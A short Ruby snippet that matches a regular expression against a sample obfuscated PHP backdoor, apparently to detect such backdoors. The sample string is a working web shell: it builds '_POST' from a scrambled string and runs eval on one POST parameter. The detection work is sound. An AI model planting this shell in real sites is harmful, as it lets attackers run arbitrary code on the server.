re = /<\?php\s+\$[a-z].+?strtoupper.+?isset.+?eval\s*\(\s*\${\s*\$[a-z0-9]+\s*}\s*\[\s*'[a-z0-9]+'\s*\]\s*\);\s*}\s*\?>\s*/m
str = '<?php $lin3 = "sotp_";$pim6=strtoupper( $lin3[4].$lin3[3] . $lin3[1]. $lin3[0]. $lin3[2] ) ; if (isset ( ${$pim6} [\'q23f412\' ]) ){eval( ${$pim6}[\'q23f412\' ] );} ?>'
# Print the match result
str.scan(re) do |match|
puts match.to_s
end